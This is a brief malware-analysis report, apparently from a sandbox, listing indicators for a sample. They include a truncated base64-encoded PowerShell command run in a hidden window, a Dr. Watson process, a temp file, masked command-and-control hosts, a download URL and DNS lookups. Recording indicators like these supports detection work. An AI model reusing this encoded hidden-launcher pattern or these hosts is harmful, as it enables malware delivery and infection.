Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAGIAcQBiAHcAaQBwAHcAcQA9ACcASQBvAGsAZwBkAGEAdgBhACcAOwAkAFQAbgBmAG0AZAByAHUAcwBuAGQAIAA9ACAAJwAxADgANwAnADsAJABXAGEAbQBmAGUAZwBlAGIAcQBjAGMAYwA9ACcASgB6AHYAbQBiAHkAdwBpAGoAeAAnADsAJABZAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1964
- %TEMP%\976004.cvr
- 'ac######on.mathetmots.com':443
- 'tr########orate.volcanicvalley.com':80
- http://tr########orate.volcanicvalley.com/tgrncf/TR5wOl2/
- DNS ASK ac######on.mathetmots.com
- DNS ASK cr#.###universal.com
- DNS ASK tr########orate.volcanicvalley.com
- DNS ASK ho#####.cypshluchim.com
- DNS ASK my###mkat.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAGIAcQBiAHcAaQBwAHcAcQA9ACcASQBvAGsAZwBkAGEAdgBhACcAOwAkAFQAbgBmAG0AZAByAHUAcwBuAGQAIAA9ACAAJwAxADgANwAnADsAJABXAGEAbQBmAGUAZwBlAGIAcQBjAGMAYwA9ACcASgB6AHYAbQBiAHkAdwBpAGoAeAAnADsAJABZAH... (with hidden window)